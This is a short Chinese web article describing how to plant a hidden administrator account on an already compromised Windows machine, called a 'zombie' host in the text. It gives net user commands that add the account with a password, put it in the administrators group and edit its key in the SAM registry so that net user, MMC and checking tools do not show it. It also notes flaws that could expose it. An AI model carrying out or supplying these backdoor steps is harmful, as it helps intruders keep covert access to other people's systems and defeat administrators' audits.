• 当前位置:首页>>编程开发A>>安全防御>>打造不完美的超级帐号
  • 打造不完美的超级帐号
  • 能够实现在 mmc 界面 net user 里面隐形

    用工具检查的时候 检查到的第一次建立使用的用户名 查不到隐藏的用户名

    有极大的危险性 用此方法改造注册表 造成的危害 本人概不负责

    假设肉鸡上已经存在

    administrator tesinternetuser

    将tesinternetuser 改名为temp

    net user tesinternetuser allyesno /add
    net localgroup administrator tesinternetuser /add
    修改注册表键值


    HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\tesinternetuser

    改为

    HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\ $

    将temp 改回原来名称 tesinternetuser

    net user 只会显示 administrator tsinternetuser
    mmc不会显示隐藏帐号
    用工具检查只会检查出tsinternetuser 存在

    登录的时候 用 " $" 登录(注:是空格$)

    不完美的地方 用mmc枚举的时候会报告显示 找不到帐号

    并且测试过程中发现使用这个帐号的时候 有一些应用程序会报错 例如天网

  • 上一篇:iPlanet Web Server 缓冲区溢出漏洞 
    下一篇:serv-u突破又一法